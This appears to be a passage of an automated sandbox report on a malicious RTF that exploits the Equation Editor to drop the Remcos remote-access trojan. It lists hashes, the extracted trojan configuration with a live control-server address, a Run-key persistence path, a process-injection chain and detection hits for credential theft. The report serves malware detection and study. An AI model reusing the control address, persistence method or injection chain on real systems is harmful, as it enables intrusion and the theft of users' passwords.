Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
16/03/2024, 02:41
Static task
static1
Behavioral task
behavioral1
Sample
aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf
Resource
win10v2004-20240226-en
General
-
Target
aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf
-
Size
70KB
-
MD5
cae8bb9d33e2340998ba5f75ad37f803
-
SHA1
75e142060680509acade4921ea417e1d438a34fd
-
SHA256
aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030
-
SHA512
5b5ba31eef6383798733fcb5bbbbe0b28a35b8962207b8a08c494aa18ce48cf4f296af18299b8ddff51b7d6eb07d4864b3ddf4f95bebc8c76959f8ba1e0f8d98
-
SSDEEP
1536:z8dfmjJH0y/OSefByvp/9/7otRf9rdO5WeIGLTlGrzYNY:z8dfW0yvDToXf9rd2WeI0RGYNY
Malware Config
Extracted
remcos
RemoteHost
107.172.31.178:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-NVSJ5U
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 23 IoCs
resource yara_rule behavioral1/memory/1876-153-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-155-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-159-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-157-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-161-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-165-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-167-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-170-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-171-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-172-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-174-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-175-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-176-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-177-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-179-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-208-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-209-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-211-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-212-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-213-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-232-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-233-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1876-234-0x0000000000400000-0x0000000000482000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM -
Detects executables built or packed with MPress PE compressor 12 IoCs
resource yara_rule behavioral1/memory/2116-183-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2116-187-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/3000-189-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2116-190-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/3000-193-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/3000-199-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs
resource yara_rule behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
resource yara_rule behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
resource yara_rule behavioral1/memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
Blocklisted process makes network request 6 IoCs
flow pid Process 3 3048 EQNEDT32.EXE 7 2948 powershell.exe 9 2948 powershell.exe 11 2948 powershell.exe 14 2948 powershell.exe 15 2948 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\KISS.vbs" powershell.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2948 set thread context of 1876 2948 powershell.exe 38 PID 1876 set thread context of 2116 1876 RegAsm.exe 40 PID 1876 set thread context of 3000 1876 RegAsm.exe 41 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 3048 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2784 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2868 powershell.exe 2948 powershell.exe 1992 powershell.exe 2116 RegAsm.exe 2116 RegAsm.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1876 RegAsm.exe 1876 RegAsm.exe 1876 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2784 WINWORD.EXE 2784 WINWORD.EXE -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 3048 wrote to memory of 2664 3048 EQNEDT32.EXE 29 PID 3048 wrote to memory of 2664 3048 EQNEDT32.EXE 29 PID 3048 wrote to memory of 2664 3048 EQNEDT32.EXE 29 PID 3048 wrote to memory of 2664 3048 EQNEDT32.EXE 29 PID 2664 wrote to memory of 2868 2664 WScript.exe 30 PID 2664 wrote to memory of 2868 2664 WScript.exe 30 PID 2664 wrote to memory of 2868 2664 WScript.exe 30 PID 2664 wrote to memory of 2868 2664 WScript.exe 30 PID 2868 wrote to memory of 2948 2868 powershell.exe 34 PID 2868 wrote to memory of 2948 2868 powershell.exe 34 PID 2868 wrote to memory of 2948 2868 powershell.exe 34 PID 2868 wrote to memory of 2948 2868 powershell.exe 34 PID 2784 wrote to memory of 752 2784 WINWORD.EXE 35 PID 2784 wrote to memory of 752 2784 WINWORD.EXE 35 PID 2784 wrote to memory of 752 2784 WINWORD.EXE 35 PID 2784 wrote to memory of 752 2784 WINWORD.EXE 35 PID 2948 wrote to memory of 1992 2948 powershell.exe 36 PID 2948 wrote to memory of 1992 2948 powershell.exe 36 PID 2948 wrote to memory of 1992 2948 powershell.exe 36 PID 2948 wrote to memory of 1992 2948 powershell.exe 36 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 2948 wrote to memory of 1876 2948 powershell.exe 38 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 2116 1876 RegAsm.exe 40 PID 1876 wrote to memory of 3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 3000 1876 RegAsm.exe 41 PID 1876 wrote to memory of 